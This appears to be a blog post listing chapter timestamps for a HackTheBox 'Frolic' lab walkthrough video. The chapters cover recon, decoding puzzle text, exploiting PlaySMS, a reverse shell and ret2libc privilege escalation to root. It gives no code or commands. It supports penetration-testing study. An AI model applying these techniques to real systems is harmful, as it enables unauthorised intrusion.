HackTheBox - Frolic

b6WGQSJu_zQ/default.jpg

01:16 - Begin of Recon, until around 13 minutes gathering information to avoid rabbit holes
04:04 - Using nc/ncat to verify a port is open (-zv)
11:17 - Doing gobuster across man of the sub directories
13:03 - Examining /admin/ - Examine the HTML Source because login is not sending any data
14:09 - Discover some weird text encoding (Ook), how I went about decoding it
15:44 - Decoded to base64 with some spaces, clean up the base64 and are left with a zip file
19:19 - After cracking the zip, there is another text encoding challenge (BrainF*)
25:11 - With potential information, return to our long running recon for more information
28:49 - Discovering /playsms
32:00 - Reading ExploitDB Articles and then attempting to manuall exploit PlaySMS via uploading a CSV
34:34 - Getting a reverse shell
39:00 - Running LinEnum.sh
40:00 - Finding the SetUID file: rop
42:00 - Exploiting ROP Program with ret2libc
45:30 - Getting offsets of system, exit, /bin/sh from libc using ldd, readelf, and strings
50:34 - Running our exploit to get root shell
54:00 - Begin of recovering rop.c source code
56:41 - Recreating rop.c then compiling
59:44 - Copying the physical disk to our local box via SSH and DD
01:01:44 - Using PhotoRec to restore files and finding rop.c

b6WGQSJu_zQ/default.jpg
HackTheBox - Frolic HackTheBox - Frolic Reviewed by Unknown on March 23, 2019 Rating: 5